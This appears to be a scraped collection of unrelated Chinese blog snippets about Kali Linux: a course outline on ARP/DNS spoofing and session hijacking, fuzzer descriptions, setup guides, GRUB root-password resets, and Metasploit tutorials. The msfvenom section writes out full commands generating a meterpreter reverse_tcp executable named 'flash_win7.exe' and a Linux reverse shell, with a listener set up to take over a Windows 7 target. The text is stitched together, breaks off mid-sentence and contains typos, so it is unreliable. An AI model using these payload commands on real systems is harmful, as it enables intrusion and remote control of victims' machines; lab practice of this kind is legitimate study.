kali

/*--> */ /*--> */ Kali Linux Web 渗透测试视频教程—第十四课 -arp 欺骗、嗅探、 dns 欺骗、 session 劫持 文 / 玄魂 目录 Kali Linux Web 渗透测试—第十四课 -arp 欺骗、嗅探、 dns 欺骗、 session 劫持 1 关于 嗅探、 arp 欺骗、会话劫持 .............................................................. 1 视频教程地址： http://edu.51cto.com/course/course_id-1887.html 关于 嗅探、 arp 欺骗、会话劫持 l 1. google l 2. http:// www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html l http:// www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html 会话劫持的实现手段 l 中间人攻击（ arp 欺骗， dns 欺骗） l 注射式攻击 Arp 欺骗 --ettercap l 参数说明： http:// www.91ri.org/4408.html l 2. 如果你是第一次进行中间人攻击操作，那么要对 kali 下的 ettercap 做点配置

模糊测试是一种自动化软件测试技术，涉及提供无效，意外或随机数据作为计算机程序的输入。 然后监视程序是否存在异常，例如崩溃，内置代码断言失败或潜在的内存泄漏。 通常，模糊器用于测试采用结构化输入的程序。 例如，以文件格式或协议指定该结构，并将有效与无效输入区分开。 有效的模糊器生成“有效”的半有效输入，因为它们不会被解析器直接拒绝，但会在程序中更深层次地创建意外行为，并且“足够无效”以暴露尚未正确处理的极端情况。 Bed.pl BED代表Bruteforce Exploit Detector。 它旨在检查守护进程是否存在潜在的缓冲区溢出，格式化字符串等。 ohrwurm ohrwurm是一款小巧简单的RTP模糊器，已在少数SIP电话上成功通过测试。 特征： 读取SIP消息以获取RTP端口号的信息 通过提供RTP端口号可以省略读取SIP，从而可以对任何RTP流量进行模糊测试 可以抑制RTCP流量以避免编解码器 了解“嘈杂的线条” 特别注意打破RTP处理本身 RTP有效载荷模糊了恒定的BER BER是可配置的 需要来自dsniff的arpspoof来进行MITM攻击 要求两部电话都在交换局域网中（GW操作只能部分工作） 界面： PowerFuzzer Powerfuzzer是一个高度自动化且完全可定制的Web模糊器（基于HTTP协议的应用程序模糊器）

前言 在众多Linux发行版本中，最受人们（hk）喜爱的莫过于kali Linux 至于为啥呢，且听小编细细道来 说正事 如何利用kali入侵Windows 测试准备 在本次测试中，我们准备了如下两台机器 1.运行Kali Linux的源机器 2.运行windows 7的目标机器 在这里win 7版本为32位sp1 1：创建 Payload 程序 Payload 是一个类似于病毒或者木马的程序，可以运行在远程目标上。 我们可以通过以下命令来创建 Payload（program.exe）： 通过 ls 命令，我们可以确认 Payload 程序是否成功生成在指定的位置。 创建完成后，可以通过Is命令来确认生成是否成功。 2：启动 msf 命令窗口 通过运行mfsconsole命令来启动msf命令窗口： 3：选择可利用的漏洞 4444 端口：你可以按照自己的想法来选择使用哪个端口 LHOST IP：表示 Kali Linux 机器的 IP，本例中是192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的IP： 现在在 msf 命令窗口使用 use exploit/multi/handler 命令，如下： 然后在接下来的命令窗口中使用命令 set payload 现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口，如下： 最后使用

0. 安装VMware并激活 1. 下载kali kali.org 2. 安装kali 3. 解决问题1：中文不显示 当时忘记截图，后面两张图来自 守望时空33_CSDN 解决方案：将字体复制到系统字体文件夹中。方案参考： mvpbang_博客园 下载中文字体 simsun.ttc(宋体常规) 下载 将字体文件复制到系统字体文件夹： /usr/share/fonts/ 2.1 将文件复制到虚拟机中 ，在Windows内复制，再到虚拟机中粘贴即可。 2.2 执行命令 cp simsun.ttc /usr/share/fonts/ 4. 解决问题2：系统权限 参考： 百度经验 输入 sudo passwd root 并设置密码。 输入 su root 并输入密码。 5. 解决问题3：字体放大 修改分辨率 左上角：设置->显示->修改分辨率 虚拟机拉抻显示 6. 补图 来源： CSDN 作者： z201323041121 链接： https://blog.csdn.net/z201323041121/article/details/104393356

在kali的系统中自带了一个firefox分支下的浏览器Iceweasel(Iceweasel是Mozilla Firefox浏览器的Debian再发布版),但是怎么说也配不上kali的强悍气势.还是安装原生的firefox好(ps:在我的另一篇文章里介绍了firefox里插件的强大功能). 1.添加支持firefox的安装源 deb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main"|sudotee-a/etc/apt/sources.list >/dev/null sudo apt-key adv --recv-keys--keyserver keyserver.ubuntu.com C1289A29 2.安装firefox sudo apt-get remove iceweasel apt-get update apt-get install firefox-mozilla-build 3.把firefox加到右上角显示 安装完成后可以在 Applications 的 Internet

目录 Exp0 环境搭建-Kali Linux 的安装 kali下载 kali打开 更换软件源 kali汉化 设置共享文件 安装过程中遇到的问题 下载虚拟机版本问题 输入清华的更新源时 虚拟机在NAT模式下没有网络问题 Exp0 环境搭建-Kali Linux 的安装 kali下载 首先在 Kali下载官网 中，找到VMware版本，点击下图链接 点进去后，点击64位的torrent链接，下载BT种子，然后打开迅雷下载 下载完成之后解压，他并不是一个iso镜像文件，而是一个完整的虚拟机 kali打开 打开VMware，打开虚拟机 找到文件位置点击打开，就已经装好了虚拟机，然后开机 输入用户名与密码，都为“kali”，进入kali 更换软件源 打开终端 输入 sudo -s ，再输入密码kali获得权限，输入 vi /etc/apt/sources.list 打开sources.list文件，在文件尾加入清华的更新源，退出编辑模式，输入 :wq! deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free 输入 apt

像这样，kali系统的root密码忘记了，只需一分钟时间，快速重置root密码 第一步： 电脑开机后kali系统会进入引导界面，这是我们只需 “e” 进入启动前编辑命令（若系统没有出现这个页面，大家在开机的时候可以连续按上下键来阻止系统正常启动，以此来进入引导界面） 第二步：进入启动前编辑命令界面后，找到以下内容，并修个内容： 将 ro 修改为 rw 并在后面添加：init=/bin/bash 然后按 Ctrl+x 或者 F10 进行引导操作 第三步：在命令界面中输入 passwd root 命令进行root密码重置操作 两次密码输入后，系统提示password updated successfully 说明密码重置成功！（注意：系统为了密码的安全性，在输入密码时不会显示字符） 第四步：退出命令行，重启kali系统即可完成， 输入你刚才重置的密码，即可进入系统。 so，这么简单的root密码重置操作，是不是很舒服。 来源： https://www.cnblogs.com/egsec/p/12344391.html

kali msfvenom生成木马 转：https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.让我们正式开始吧，因为我的目标平台是一个win7 64 位，所以要找一个相应的载荷。 root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp　　//linux可以对应修改 2.生成程序（默认路径是在home下） root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.80.142 lport=443 -f exe X > flash_win7.exe //linux:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 -f elf >shell_x64 4.启动msfvenom root@kali:~# msfconsole 5.通过msfconsole开始监听 root@kali:~# use exploit/multi

1.下载+解压+安装setuptools包： root@kali:~#:wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gz root@kali:~#:tar zxvf setuptools-18.5.tar.gz root@kali:~#:cd setuptools-18.5 root@kali:~#:python setup.py build root@kali:~#:python setup.py install 2.下载+解压+安装pip root@kali:~#:wget https://pypi.python.org/packages/source/p/pip/pip-7.1.2.tar.gz root@kali:~#:tar zxvf pip-7.1.2.tar.gz root@kali:~#:cd pip-7.1.2 root@kali:~#:sudo python setup.py install 这样即安装好了pip，安装完之后还安装了 sudo pip install nose sudo pip install virtualenv sudo pip install distribute 等软件包。 来源： CSDN 作者： yusec 链接：

①忘记了root密码怎么办？！ 1. 登录时，按e进入编辑模式 2. 编辑模式 修改 ro 修改为 rw 添加 init=/bin/bash 修改完按 F10 注意！！！quiet不能删掉！！！删掉了改密码好像没用？？ 3.输入命令 passwd root 设置root密码 重启 4.以root用户和新设置的密码登录 ---大功告成！！！ ②无法联网怎么办?! 1）在虚拟机设置里，网络适配器选择桥接模式，这里要勾选复制物理机网络状态。 什么是桥接模式？桥接模式就是将主机网卡与虚拟机虚拟的网卡利用虚拟网桥进行通信。在桥接的作用下，类似于把物理主机虚拟为一个交换机，所有桥接设置的虚拟机连接到这个交换机的一个接口上，物理主机也同样插在这个交换机当中，所以所有桥接下的网卡与网卡都是交换模式的，相互可以访问而不干扰 。在桥接模式下，虚拟机ip地址需要与主机在同一个网段，如果需要联网，则网关与DNS需要与主机网卡一致。 关于区别， https://blog.csdn.net/zzw_17805056819/article/details/81272021 这个网址说的很详细。 我们查看物理机中连接无线网的详细信息。 然后查看虚拟机的网络设置中高级设置，查看物理地址，一起添加到kali的网卡配置中去。 配置静态IP： 添加自己网段的DNS， 然后配置网卡信息，和物理机一一对应。 netmask